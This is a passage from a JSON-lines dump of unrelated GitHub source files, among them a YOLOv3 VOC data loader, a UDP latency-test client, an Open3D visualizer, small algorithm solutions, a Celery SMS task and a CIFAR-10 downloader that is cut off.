ax.scatter(x1d, x2d, pr, c='b')\r\n ax.set_xlabel('x1 feature')\r\n ax.set_ylabel('x2 feature')\r\n ax.set_zlabel('predicted(blue) vs actual(red) output')\r\n plt.show()\r\n \r\nif __name__==\"__main__\":\r\n main()\r\n\r\n","repo_name":"devarajnadiger/LinearRegression","sub_path":"linear_regression_regu.py","file_name":"linear_regression_regu.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17970357366","text":"import torch\nimport torch.utils.data\nimport torchvision.transforms\nimport PIL.Image, PIL.ImageDraw, PIL.ImageFont\nimport os\nimport xml.dom.minidom\nimport math\nimport random\nimport numpy as np\n\nimport YOLOv3_DataAugmentations\n\nclass VOCDataset(torch.utils.data.Dataset):\n VOCClassDict_name2num = {\n \"aeroplane\": 0, \"bicycle\": 1, \"bird\": 2, \"boat\": 3, \"bottle\": 4,\n \"bus\": 5, \"car\": 6, \"cat\": 7, \"chair\": 8, \"cow\": 9,\n \"diningtable\": 10, \"dog\": 11, \"horse\": 12, \"motorbike\": 13, \"person\": 14,\n \"pottedplant\": 15, \"sheep\": 16, \"sofa\": 17, \"train\": 18, \"tvmonitor\": 19\n }\n\n VOCClassDict_num2name = {\n 0: \"aeroplane\", 1: \"bicycle\", 2: \"bird\", 3: \"boat\", 4: \"bottle\",\n 5: \"bus\", 6: \"car\", 7: \"cat\", 8: \"chair\", 9: \"cow\",\n 10: \"diningtable\", 11: \"dog\", 12: \"horse\", 13: \"motorbike\", 14: \"person\",\n 15: \"pottedplant\", 16: \"sheep\", 17: \"sofa\", 18: \"train\", 19: \"tvmonitor\"\n }\n\n anchorBox = (\n ((116 / 416, 90 / 416), (156 / 416, 198 / 416), (373 / 416, 326 / 416)), # mapA, 归一化后的W x H;\n ((30 / 416, 61 / 416), (62 / 416, 45 / 416), (59 / 416, 119 / 416)), # mapB, 归一化后的W x H\n ((10 / 416, 13 / 416), (16 / 416, 30 / 416), (33 / 416, 23 / 416)) # mapC, 归一化后的W x H\n ) #在图片大小为416x416时,mapA为13x13,mapB为26x26,mapC为52x52\n\n def __init__(self, path, yoloImageSize = 416, useDataAugmentation = True):\n super().__init__()\n datasetPath = path\n if datasetPath[-1] != \"/\":\n datasetPath = datasetPath + \"/\"\n\n devkitPath = \"{}VOCdevkit/\".format(datasetPath)\n year = int(os.listdir(devkitPath)[0][3:])\n\n self.imgFolderPath = \"{}VOCdevkit/VOC{}/JPEGImages/\".format(datasetPath, year)\n self.imgFileExtension = \".jpg\"\n self.antFolderPath = \"{}VOCdevkit/VOC{}/Annotations/\".format(datasetPath, year)\n self.antFileExtension = \".xml\"\n\n self.fileNameList = []\n imgFileList = 
os.listdir(self.imgFolderPath)\n for i in imgFileList:\n if os.path.isfile(\"{}{}\".format(self.imgFolderPath, i)):\n self.fileNameList.append(i[0:-4])\n\n self.yoloImageSize = yoloImageSize\n self.useDataAugmentation = useDataAugmentation\n\n self.transform = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n\n print(\"Loading VOC{} Dataset for YOLO v3.\".format(year))\n print(\"This Dataset Contains {} Images and Annotations.\".format(len(self.fileNameList)))\n print(\"\")\n\n def __getitem__(self, index):\n imgFilePath = \"{}{}{}\".format(self.imgFolderPath, self.fileNameList[index], self.imgFileExtension)\n antFilePath = \"{}{}{}\".format(self.antFolderPath, self.fileNameList[index], self.antFileExtension)\n\n #原始图片\n originalImage = PIL.Image.open(imgFilePath) # pillow加载图片时默认的数据格式为RGB\n #原始标签信息\n domTree = xml.dom.minidom.parse(antFilePath)\n rootNode = domTree.documentElement\n objectNodes = rootNode.getElementsByTagName(\"object\")\n antInfoList_original = [] # dim2: 0 xmin, 1 ymin, 2 xmax, 3 ymax, 4 name. In original size image.\n for i in objectNodes:\n tl = []\n tl.append(int(float(i.getElementsByTagName(\"bndbox\")[0].getElementsByTagName(\"xmin\")[0].childNodes[0].data)))\n tl.append(int(float(i.getElementsByTagName(\"bndbox\")[0].getElementsByTagName(\"ymin\")[0].childNodes[0].data)))\n tl.append(int(float(i.getElementsByTagName(\"bndbox\")[0].getElementsByTagName(\"xmax\")[0].childNodes[0].data)))\n tl.append(int(float(i.getElementsByTagName(\"bndbox\")[0].getElementsByTagName(\"ymax\")[0].childNodes[0].data)))\n tl.append(i.getElementsByTagName(\"name\")[0].childNodes[0].data)\n antInfoList_original.append(tl)\n\n #缩放后的图片\n resizedImage = None\n if originalImage.width > originalImage.height:\n resizedImage = originalImage.resize((self.yoloImageSize, int(originalImage.height / originalImage.width * self.yoloImageSize)),\n PIL.Image.ANTIALIAS)\n else:\n resizedImage = originalImage.resize((int(originalImage.width / originalImage.height * self.yoloImageSize), self.yoloImageSize),\n PIL.Image.ANTIALIAS)\n xy_factor_0 = resizedImage.width / originalImage.width\n #缩放后的标签信息\n antInfoList_resized = [] # dim2: 0 xmin, 1 ymin, 2 xmax, 3 ymax, 4 name. In resized image.\n for ant in antInfoList_original:\n tl = []\n tl.append(int(ant[0] * xy_factor_0))\n tl.append(int(ant[1] * xy_factor_0))\n tl.append(int(ant[2] * xy_factor_0))\n tl.append(int(ant[3] * xy_factor_0))\n tl.append(ant[4])\n antInfoList_resized.append(tl)\n\n finalImage = PIL.Image.new(\"RGB\", (self.yoloImageSize, self.yoloImageSize), (128, 128, 128))\n antInfoList_final = [] # dim2: 0 xmin, 1 ymin, 2 xmax, 3 ymax, 4 name. 
In (yoloImageSize x yoloImageSize) Image.\n\n if self.useDataAugmentation:\n StartAugmentation = YOLOv3_DataAugmentations.StartAugmentation()\n EndAugmentation = YOLOv3_DataAugmentations.EndAugmentation()\n RandomBrightness = YOLOv3_DataAugmentations.RandomBrightness(32)\n RandomContrast = YOLOv3_DataAugmentations.RandomContrast(0.5, 1.5)\n RandomSaturation = YOLOv3_DataAugmentations.RandomSaturation(0.5, 1.5)\n RandomHue = YOLOv3_DataAugmentations.RandomHue(9)\n RandomLightingNoise = YOLOv3_DataAugmentations.RandomLightingNoise()\n RandomMirror = YOLOv3_DataAugmentations.RandomMirror()\n RandomResize = YOLOv3_DataAugmentations.RandomResize(0.8, 1.0, 0.8, 1.0, 25)\n\n augImage, antInfoList_aug = StartAugmentation(resizedImage, antInfoList_resized)\n augImage, antInfoList_aug = RandomBrightness(augImage, antInfoList_aug)\n augImage, antInfoList_aug = RandomContrast(augImage, antInfoList_aug)\n augImage, antInfoList_aug = RandomSaturation(augImage, antInfoList_aug)\n augImage, antInfoList_aug = RandomHue(augImage, antInfoList_aug)\n augImage, antInfoList_aug = RandomLightingNoise(augImage, antInfoList_aug)\n augImage, antInfoList_aug = RandomMirror(augImage, antInfoList_aug)\n augImage, antInfoList_aug = RandomResize(augImage, antInfoList_aug)\n augImage, antInfoList_aug = EndAugmentation(augImage, antInfoList_aug)\n\n originCoord = (\n random.randint(0, finalImage.width - augImage.width),\n random.randint(0, finalImage.height - augImage.height)\n )\n finalImage.paste(augImage, originCoord)\n for ant in antInfoList_aug:\n tl = []\n tl.append(ant[0] + originCoord[0])\n tl.append(ant[1] + originCoord[1])\n tl.append(ant[2] + originCoord[0])\n tl.append(ant[3] + originCoord[1])\n tl.append(ant[4])\n antInfoList_final.append(tl)\n else:\n originCoord = (\n int((finalImage.width - resizedImage.width) / 2),\n int((finalImage.height - resizedImage.height) / 2)\n )\n finalImage.paste(resizedImage, originCoord)\n for ant in antInfoList_resized:\n tl = []\n tl.append(ant[0] + originCoord[0])\n tl.append(ant[1] + originCoord[1])\n tl.append(ant[2] + originCoord[0])\n tl.append(ant[3] + originCoord[1])\n tl.append(ant[4])\n antInfoList_final.append(tl)\n\n yolov3InfoList = [] # dim2: 0 centerX, 1 centerY, 2 width, 3 height, 4 nameID. In (yoloImageSize x yoloImageSize) Image.\n for ant in antInfoList_final:\n tl = []\n tl.append((ant[0] + ant[2]) / 2)\n tl.append((ant[1] + ant[3]) / 2)\n tl.append(ant[2] - ant[0])\n tl.append(ant[3] - ant[1])\n tl.append(VOCDataset.VOCClassDict_name2num[ant[4]])\n yolov3InfoList.append(tl)\n\n # 初始化labelData_X,每一个预测边界框的标签数据的格式为 s(tx), s(ty), tw, th, s(to), s(tc1), ... 
, s(tc20)\n # 其中s(x) = sigmoid(x)\n labelData_A = np.zeros((self.yoloImageSize // 32, self.yoloImageSize // 32, 3, 25)).tolist()\n\n labelData_B = np.zeros((self.yoloImageSize // 16, self.yoloImageSize // 16, 3, 25)).tolist()\n\n labelData_C = np.zeros((self.yoloImageSize // 8, self.yoloImageSize // 8, 3, 25)).tolist()\n\n # 初始化labelTag_X\n # 每一个预测边界框的标记默认是”不负责预测真实边界框“。如果在labelTag_X���被特殊标记了,那么: 1 ”忽略“,2 ”负责预测某个真实边界框“\n # 本程序假定每张图最多有100个真实边界框\n labelTag_A = []\n\n labelTag_B = []\n\n labelTag_C = []\n\n for y in yolov3InfoList:\n iouList = []\n anchorIDList = []\n box_t = (0, 0, y[2], y[3])\n for i in range(0, 9):\n box_a = (0, 0, VOCDataset.anchorBox[i // 3][i % 3][0] * self.yoloImageSize, VOCDataset.anchorBox[i // 3][i % 3][1] * self.yoloImageSize)\n iouList.append(self.calculate_iou(box_a, box_t, 0))\n anchorIDList.append(i)\n #冒泡排序\n while True:\n ok = True\n for i in range(0, len(iouList) - 1):\n if iouList[i + 1] > iouList[i]:\n ok = False\n tmp = iouList[i]\n iouList[i] = iouList[i + 1]\n iouList[i + 1] = tmp\n tmp = anchorIDList[i]\n anchorIDList[i] = anchorIDList[i + 1]\n anchorIDList[i + 1] = tmp\n if ok:\n break\n\n for i in range(0, 9):\n anchorID = anchorIDList[i]\n sLabelData_X = labelData_A\n sLabelTag_X = labelTag_A\n if (anchorID // 3) == 0:\n sLabelData_X = labelData_A\n sLabelTag_X = labelTag_A\n elif (anchorID // 3) == 1:\n sLabelData_X = labelData_B\n sLabelTag_X = labelTag_B\n elif (anchorID // 3) == 2:\n sLabelData_X = labelData_C\n sLabelTag_X = labelTag_C\n gridNum = len(sLabelData_X)\n row = int(y[1] / (self.yoloImageSize / gridNum))\n col = int(y[0] / (self.yoloImageSize / gridNum))\n boxID = anchorID % 3\n tag = [row, col, boxID, 2] #”负责预测某个真实边界框“\n if tag not in sLabelTag_X:\n sLabelTag_X.append(tag)\n sLabelData_X[row][col][boxID][0] = y[0] / (self.yoloImageSize / gridNum) - col\n sLabelData_X[row][col][boxID][1] = y[1] / (self.yoloImageSize / gridNum) - row\n sLabelData_X[row][col][boxID][2] = math.log(y[2] / (VOCDataset.anchorBox[anchorID // 3][anchorID % 3][0] * self.yoloImageSize))\n sLabelData_X[row][col][boxID][3] = math.log(y[3] / (VOCDataset.anchorBox[anchorID // 3][anchorID % 3][1] * self.yoloImageSize))\n sLabelData_X[row][col][boxID][4] = 1\n sLabelData_X[row][col][boxID][5 + y[4]] = 1\n break\n\n for i in range(len(labelTag_A), 3 * 100):\n labelTag_A.append([-1, -1, -1, -1])\n for i in range(len(labelTag_B), 3 * 100):\n labelTag_B.append([-1, -1, -1, -1])\n for i in range(len(labelTag_C), 3 * 100):\n labelTag_C.append([-1, -1, -1, -1])\n\n imgTensor = self.transform(finalImage).to(torch.float32)\n\n t_labelData_A = torch.tensor(labelData_A, dtype = torch.float32)\n t_labelData_B = torch.tensor(labelData_B, dtype = torch.float32)\n t_labelData_C = torch.tensor(labelData_C, dtype=torch.float32)\n t_labelTag_A = torch.tensor(labelTag_A, dtype=torch.int16)\n t_labelTag_B = torch.tensor(labelTag_B, dtype=torch.int16)\n t_labelTag_C = torch.tensor(labelTag_C, dtype=torch.int16)\n\n return imgTensor, t_labelData_A, t_labelData_B, t_labelData_C, t_labelTag_A, t_labelTag_B, t_labelTag_C\n\n def __len__(self):\n return len(self.fileNameList)\n\n def calculate_iou(self, box1, box2, format):\n # format: 0, 1。\n # 当format == 0,box1和box2格式应为(center_x, center_y, width, height)\n # 当format == 1,box1和box2的格式应为(x1, y1, x2, y2)\n\n # 计算box1和box2的iou\n if format == 0:\n box1 = (box1[0] - 0.5 * box1[2], box1[1] - 0.5 * box1[3], box1[0] + 0.5 * box1[2], box1[1] + 0.5 * box1[3])\n box2 = (box2[0] - 0.5 * box2[2], box2[1] - 0.5 * box2[3], box2[0] + 0.5 * box2[2], box2[1] 
+ 0.5 * box2[3])\n\n intersect_box = [0., 0., 0., 0.] # box1和box2的交集\n if box1[2] < box2[0] or box1[0] > box2[2] or box1[3] < box2[1] or box1[1] > box2[3]:\n pass\n else:\n intersect_box[0] = max(box1[0], box2[0])\n intersect_box[1] = max(box1[1], box2[1])\n intersect_box[2] = min(box1[2], box2[2])\n intersect_box[3] = min(box1[3], box2[3])\n\n area1 = (box1[2] - box1[0]) * (box1[3] - box1[1]) # box1面积\n area2 = (box2[2] - box2[0]) * (box2[3] - box2[1]) # box2面积\n area_intersect = (intersect_box[2] - intersect_box[0]) * (intersect_box[3] - intersect_box[1]) # 交集面积\n\n if area_intersect > 0:\n return area_intersect / (area1 + area2 - area_intersect) # 计算iou\n else:\n return 0\n\n def drawBBox(self, img, bboxInfo, color):\n \"\"\"\n 参数:\n img: PIL图片对象\n bboxInfo: 边界框信息列表,结构为[[xmin, ymin, xmax, ymax, classname], ...]\n color: 格式为(R, G, B)\n 功能:\n 在图上画出边界框并标注边界框内物体类别名称,用于Debug。\n 该函数会在一个新的PIL图片对象上绘图,不会影响原来的PIL图片对象。\n \"\"\"\n img = img.copy()\n draw = PIL.ImageDraw.Draw(img)\n myFont = PIL.ImageFont.truetype(\"./Fonts/msyhbd.ttc\", 20)\n for b in bboxInfo:\n draw.rectangle(xy=(b[0], b[1], b[2], b[3]), fill=None, outline=color, width=1)\n draw.text(xy=(b[0], b[1] - 20), text=b[4], fill=color, font=myFont)\n return img\n","repo_name":"yangyilin52/YOLOv3-Aluminum-Surface-Defect-Detection","sub_path":"YOLOv3_VOC/YOLOv3_VOCDataset.py","file_name":"YOLOv3_VOCDataset.py","file_ext":"py","file_size_in_byte":14932,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"} +{"seq_id":"72866388256","text":"import argparse\nimport socket\nimport threading\nimport time\n\n# This is the file that a real external client will use to send data\n\n# EXAMPLE CALL:\n# python external_send.py --dst_ip 127.0.1.1 --dst_port 8085 --src_ip 127.0.0.1\n\nparser = argparse.ArgumentParser(description='Server')\n# parser.add_argument('--internal_address', type=str, help='Internal mininet address')\nparser.add_argument('--dst_ip', type=str, help='')\nparser.add_argument('--dst_port', type=int, help='')\nparser.add_argument('--src_ip', type=str, help='')\nparser.add_argument('--message', type=str, default=\"hello from rpi!\")\nargs = parser.parse_args()\n\n\n\nLISTEN_SOCKET = None\nSEND_COUNTER = 0\nSEND_TIMES = {}\nSEND_LIMIT = 10\n\ndef listen_thread(cSock, message_str, dst_ip, dst_port):\n\n print(\"Set up listener...hi\")\n \n \n # Time that we wait between replies\n time_diff_wait = 0.5\n\n while True:\n data, address = LISTEN_SOCKET.recvfrom(512)\n # Example address: ('10.0.0.2', 48619)\n # If we receive something\n if len(data):\n message = data.decode()\n print(message)\n\n if \"reply\" in message and len(SEND_TIMES.keys()) < SEND_LIMIT:\n \n \t# Get the message index\n msg_index = int(message.split(\":\")[1])\n \n\t\t# Determine the time difference\n current_time_diff = (time.time() - SEND_TIMES[msg_index])\n current_time_diff = current_time_diff / 2 # Get one-way time\n if current_time_diff > 0: # Just a temp hack\n print(\"Time difference: %f seconds\" % (current_time_diff))\n # last_reply_time = time.time()\n # Once we get a reply, send another message back\n send_message = custom_marshall(message_str)\n clientSocket.sendto(send_message, (dst_ip, dst_port))\n time.sleep(time_diff_wait) # Sleep for 0.5sec\n\n# Form the data to transmit\ndef custom_marshall(message):\n\n global SEND_COUNTER\n\n message_to_send = message #':'.join([destination_id, origin_id, message])\n message_to_send += \":\" + str(SEND_COUNTER)\n SEND_TIMES[SEND_COUNTER] = time.time()\n SEND_COUNTER += 1\n 
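# encode to bytes for sendto(); the timestamp stored above lets listen_thread estimate round-trip latency\n    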
return message_to_send.encode()\n\nif __name__ == '__main__':\n\n # Create socket\n clientSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n clientSocket.bind((args.src_ip, args.dst_port))\n # clientSocket.setsockopt(socket.SOL_SOCKET, 25, (\"vclient2-hveth\").encode('utf-8'))\n message = custom_marshall(args.message)\n # message = \"hello mario\".encode()\n\n print(\"Message: \" + message.decode())\n # If this is from a physical node, it can be something like\n clientSocket.sendto(message, \\\n (args.dst_ip, args.dst_port))\n\n print(\"Sent message...\")\n\n # LISTEN_SOCKET = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n # LISTEN_SOCKET.bind((args.src_ip, args.dst_port))\n clientSocket.settimeout(10)\n LISTEN_SOCKET = clientSocket\n\n server_listen = threading.Thread(target=listen_thread, \\\n \targs=(clientSocket, args.message, args.dst_ip, args.dst_port))\n server_listen.start()\n","repo_name":"nesl/IoCT-Testbed-Simulation","sub_path":"tests/simple_reply_test/external_send.py","file_name":"external_send.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21546933075","text":"import open3d as o3d\nimport numpy as np \nimport os\nimport copy\nimport time\nimport matplotlib.pyplot as plt\n\ndef create_pcd(xyz, color):\n\t# n x 3\n\tn = xyz.shape[0]\n\tpcd = o3d.geometry.PointCloud()\n\tpcd.points = o3d.utility.Vector3dVector(xyz)\n\tpcd.colors = o3d.utility.Vector3dVector(np.tile(color, (n, 1)))\n\tpcd.estimate_normals(search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.1, max_nn=30))\n\treturn pcd\n\ndef flip_geometries(pcds):\n\tpcds_transform = []\n\tflip_transform = [[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]]\n\tfor pcd in pcds:\n\t\tpcd_temp = copy.deepcopy(pcd)\n\t\tpcd_temp.transform(flip_transform)\n\t\tpcds_transform.append(pcd_temp)\n\treturn pcds_transform\n\nclass Visualizer:\n\tdef __init__(self, sleep_time=0.01):\n\t\timport time\n\t\tself.vis = o3d.visualization.Visualizer()\n\t\tself.vis.create_window()\n\t\tself.sleep_time = sleep_time\n\t\tself.counter = 1\n\n\tdef add_geometry(self, pcds):\n\t\tfor pc in pcds: self.vis.add_geometry(pc)\n\n\tdef remove_geometry(self, pcds, reset_bounding_box=False):\n\t\tfor pc in pcds: self.vis.remove_geometry(pc, reset_bounding_box=reset_bounding_box)\n\n\tdef update(self, pcds):\n\t\tfor pc in pcds: self.vis.update_geometry(pc)\n\n\tdef render(self, capture=False):\n\t\tself.set_zoom()\n\t\tself.vis.poll_events()\n\t\tself.vis.update_renderer()\n\t\tif capture: self.capture()\n\t\ttime.sleep(self.sleep_time)\n\n\tdef destroy(self):\n\t\tself.vis.destroy_window()\n\n\tdef set_zoom(self):\n\t\tctr = self.vis.get_view_control()\n\t\tctr.set_zoom(1.1)\n\n\tdef capture(self):\n\t\timage = self.vis.capture_screen_float_buffer(False)\n\t\tplt.imsave(\"images/{:03d}.png\".format(self.counter), np.asarray(image), dpi = 30)\n\t\tself.counter += 1\n\n\tdef rotate_view(self):\n\t\tctr = self.vis.get_view_control()\n\t\tctr.rotate(10.0, -0.0)\n\t\t\n\ndef display_results(template, source, est_T, mask_idx, est_T_series):\n\tnon_mask_idx = np.array([i for i in range(1024) if i not in mask_idx])\n\tunmasked_template = template[non_mask_idx]\n\tmasked_template = template[mask_idx]\n\n\ttransformed_source = np.matmul(est_T[0:3, 0:3], source.T).T + est_T[0:3, 3]\n\t\n\ttemplate_ = create_pcd(template, np.array([1, 0.706, 0]))\n\tsource_ = create_pcd(source, np.array([0, 0.929, 0.651]))\n\ttransformed_source_ = 
create_pcd(transformed_source, np.array([0, 0.651, 0.921]))\n\tmasked_template_ = create_pcd(masked_template, np.array([1, 0.706, 0]))\n\tunmasked_template_ = create_pcd(unmasked_template, np.array([1,0,0]))\n\n\ttemplate_, source_, transformed_source_, masked_template_, unmasked_template_ = flip_geometries([template_, source_, transformed_source_, masked_template_, unmasked_template_])\n\n\tvis = Visualizer()\n\n\t# Start creating initial_files (Contains template, source, masked_template and result of PointNetLK iterations)\n\tvis.add_geometry([template_, source_])\n\tvis.render(capture=True)\n\n\tvis.remove_geometry([template_])\n\tvis.add_geometry([masked_template_])\n\tvis.render(capture=True)\n\t\n\ttransformed_source = create_pcd(source, np.array([0, 0.651, 0.921]))\n\ttransformed_source = flip_geometries([transformed_source])[0]\n\tvis.add_geometry([transformed_source])\n\tvis.render(capture=True)\n\n\tfor i in range(1, 11):\n\t\test_T = est_T_series[i*4:(i+1)*4, :]\n\t\ttransformed_source_i = np.matmul(est_T[0:3, 0:3], source.T).T + est_T[0:3, 3]\n\t\ttransformed_source_i = create_pcd(transformed_source_i, np.array([0, 0.651, 0.921]))\n\t\ttransformed_source_i = flip_geometries([transformed_source_i])[0]\n\t\ttransformed_source.points = o3d.utility.Vector3dVector(transformed_source_i.points)\n\t\tvis.update([transformed_source])\n\t\tvis.render(capture=True)\n\n\t# Start creating files (Contains rotating view of [template, source and registered point cloud i.e. aligned with temnplate])\n\tvis.remove_geometry([masked_template_])\n\tvis.add_geometry([template_])\n\tvis.render(capture=True)\n\n\tfor i in range(0, 220):\n\t\tvis.rotate_view()\n\t\tvis.render(capture=True)\n\n\tvis.destroy()\n\ndef read_data(path):\n\tdata = np.load(path)\n\ttemplate = data['template']\n\tsource = data['source']\n\test_T_series = data['est_T_series']\n\test_T = data['est_T']\n\tmesh = data['mesh']\n\tmask_idx = data['mask_idx']\n\treturn template, source, est_T, mask_idx, est_T_series\n\n\nif __name__ == '__main__':\n\tpath = '3dmatch_results.npz'\n\ttemplate, source, est_T, mask_idx, est_T_series = read_data(path)\n\n\tif not os.path.exists('images'): os.mkdir('images')\n\tdisplay_results(template, source, est_T, mask_idx, est_T_series)","repo_name":"vinits5/masknet","sub_path":"3dmatch/plot_figures.py","file_name":"plot_figures.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"34"} +{"seq_id":"8107437391","text":"from sys import stdin\nfrom collections import deque\n\n# 2시간 걸렸는데 집중 안한시간 빼면 1시간 40분??\n\nN, M, K = map(int, stdin.readline().split())\nMap = [list(map(int, stdin.readline().split())) for _ in range(N)]\n\ndice = [deque((4, 1, 3, 6)), deque((2, 1, 5, 6))] # [1][0] 서 [2][0] 북 [][1] 윗수 [1][2] 동 [2][2] 남 [][3] -> 아랫수\nmove_ = [(0, 1), (1, 0), (0, -1), (-1, 0)]\n\nd_y, d_x = 0, 0\ndir_ = 0\nSum_ = 0\n\n\ndef move_dice(): # dir 0 ~ 3 -> 동, 남, 서, 북\n global dice, d_y, d_x\n\n if dir_ // 2 == 1:\n dice[dir_ % 2].append(dice[dir_ % 2].popleft())\n\n else:\n dice[dir_ % 2].appendleft(dice[dir_ % 2].pop())\n\n list1, list2 = [], []\n\n for _ in range(4):\n list1.append(dice[1 - dir_ % 2].popleft())\n list2.append(dice[dir_ % 2].popleft())\n\n list1[1], list1[3] = list2[1], list2[3]\n\n for index in range(4):\n dice[1 - dir_ % 2].append(list1[index])\n dice[dir_ % 2].append(list2[index])\n\n d_y, d_x = d_y + move_[dir_][0], d_x + move_[dir_][1]\n add_score()\n\n\ndef add_score():\n global Sum_, dir_\n\n check = 
[[False for _ in range(M)] for _ in range(N)]\n que = deque()\n que.append([d_y, d_x])\n check[d_y][d_x] = True\n\n base = Map[d_y][d_x]\n count = 1\n while len(que):\n cur_y, cur_x = que.popleft()\n for i in range(4):\n ny, nx = cur_y + move_[i][0], cur_x + move_[i][1]\n if 0 <= ny < N and 0 <= nx < M:\n if check[ny][nx] is False and Map[ny][nx] == Map[cur_y][cur_x]:\n check[ny][nx] = True\n que.append([ny, nx])\n count += 1\n\n Sum_ += base * count\n dice_ = dice[0].pop()\n dice[0].append(dice_)\n\n if dice_ > Map[d_y][d_x]:\n dir_ = (dir_ + 1) % 4\n elif dice_ < Map[d_y][d_x]:\n dir_ = (dir_ + 3) % 4\n\n ny, nx = d_y + move_[dir_][0], d_x + move_[dir_][1]\n if not (0 <= ny < N and 0 <= nx < M):\n dir_ = (dir_ + 2) % 4\n\n\nif __name__==\"__main__\":\n for _ in range(K):\n move_dice()\n\n print(Sum_)\n","repo_name":"jongwook98/algorithm_python","sub_path":"6.연습/주사위굴리기2.py","file_name":"주사위굴리기2.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39474109892","text":"import logging\n\nfrom celery_tasks.main import app\n\nfrom meiduo_mall.libs.yuntongxun.sms import CCP\n\nlogger = logging.getLogger('django')\n\n#验证码短信模板\nSMS_CODE_TEMP_ID = 1\n\n@app.task(name = 'sends_sms_code')\ndef send_sms_code(mobile,code,expires):\n '''\n 发送短信验证码\n :param mobile:手机号\n :param code: 验证码\n :param expires: 有效期\n :return: None\n '''\n logging.info('-----------------------------------')\n logging.info(code)\n logging.info('-----------------------------------')\n try:\n ccp =CCP()\n # result = ccp.send_template_sms(mobile,[code,expires],SMS_CODE_TEMP_ID)\n result = 0\n except Exception as e:\n logger.error(\"发送短信验证码【异常】:%s,message:%s ]\" %(mobile,e))\n\n else:\n if result == 0:\n logger.info(\"发送短信【正常】【mobile:%s]\" % mobile)\n\n else:\n logging.info('-----------------------------------')\n logging.info(code)\n logging.info('-----------------------------------')\n logger.warning('result%s'%result)\n logger.warning(\"发送短信验证码【失败】【mobile:%s ]\" % mobile)\n\n\n\n\n","repo_name":"wangdengkai/meiduo_mall","sub_path":"meiduo_mall/celery_tasks/sms/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8107243711","text":"from sys import stdin\nfrom collections import deque\n\nTest_case = int(stdin.readline().strip())\n\ndx = [1, 2, 2, 1, -1, -2, -2, -1]\ndy = [2, 1, -1, -2, -2, -1, 1, 2]\n\nfor _ in range(Test_case):\n chess_size = int(stdin.readline().strip())\n Que = deque()\n check = [[False] * chess_size for _ in range(chess_size)]\n\n Y, X = map(int, stdin.readline().split())\n Que.append((Y, X))\n check[Y][X] = 0\n\n des_y, des_x = map(int, stdin.readline().split())\n\n while Que:\n cur_y, cur_x = Que.popleft()\n if des_y == cur_y and des_x == cur_x:\n break\n for i in range(len(dx)):\n ny = cur_y + dy[i]\n nx = cur_x + dx[i]\n if 0 <= ny < chess_size and 0 <= nx < chess_size:\n if check[ny][nx] == False:\n Que.append((ny, nx))\n check[ny][nx] = check[cur_y][cur_x] + 1\n\n print(check[cur_y][cur_x])","repo_name":"jongwook98/algorithm_python","sub_path":"5.그래프/나이트의이동.py","file_name":"나이트의이동.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13830428663","text":"# CIFAR10 Downloader\n\nimport logging\nimport pickle\nimport math\nimport os\nimport errno\nimport tarfile\nimport 
shutil\nimport numpy as np\nimport urllib3\nfrom sklearn.model_selection import train_test_split\nfrom utils.adapt_data import adapt_labels_outlier_task\n\nlogger = logging.getLogger(__name__)\n\ndef get_train(label=-1, centered=True, normalize=True):\n return _get_adapted_dataset(\"train\", label, centered, normalize)\n\ndef get_test(label=-1, centered=True, normalize=True):\n return _get_adapted_dataset(\"test\", label, centered, normalize)\n\ndef get_valid(label=-1, centered=True, normalize=True):\n return _get_adapted_dataset(\"valid\", label, centered, normalize)\n \ndef get_shape_input():\n return (None, 32, 32, 3)\n\ndef get_shape_input_flatten():\n return (None, 32*32*3)\n\ndef get_shape_label():\n return (None,)\n\ndef num_classes():\n return 10\n\ndef get_anomalous_proportion():\n return 0.9\n\ndef _unpickle_file(filename):\n logger.debug(\"Loading pickle file: {}\".format(filename))\n\n with open(filename, mode='rb') as file:\n data = pickle.load(file, encoding='bytes')\n\n # Reorder the data\n img = data[b'data']\n img = img.reshape([-1, 3, 32, 32])\n img = img.transpose([0, 2, 3, 1])\n # Load labels\n lbl = np.array(data[b'labels'])\n\n return img, lbl\n\ndef _get_dataset(split, centered=False, normalize=False):\n '''\n Gets the adapted dataset for the experiments\n Args : \n split (str): train or test\n normalize (bool): (Default=True) normalize data\n centered (bool): (Default=False) data centered to [-1, 1]\n Returns : \n (tuple): images and labels\n '''\n path = \"data\"\n dirname = \"cifar-10-batches-py\"\n data_url = \"http://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz\"\n\n if not os.path.exists(os.path.join(path, dirname)):\n # Extract or download data\n try:\n os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n \n file_path = os.path.join(path, data_url.split('/')[-1])\n if not os.path.exists(file_path):\n # Download\n logger.warn(\"Downloading {}\".format(data_url))\n with urllib3.PoolManager().request('GET', data_url, preload_content=False) as r, \\\n open(file_path, 'wb') as w:\n shutil.copyfileobj(r, w)\n\n logger.warn(\"Unpacking {}\".format(file_path))\n # Unpack data\n tarfile.open(name=file_path, mode=\"r:gz\").extractall(path)\n\n # Import the data\n if split == 'test':\n filenames = [\"test_batch\"] \n # elif split == 'valid':\n # filenames = [\"data_batch_5\"]\n else:\n filenames = [\"data_batch_{}\".format(i) for i in range(1, 6)]\n \n imgs = []\n lbls = []\n for f in filenames:\n img, lbl = _unpickle_file(os.path.join(path, 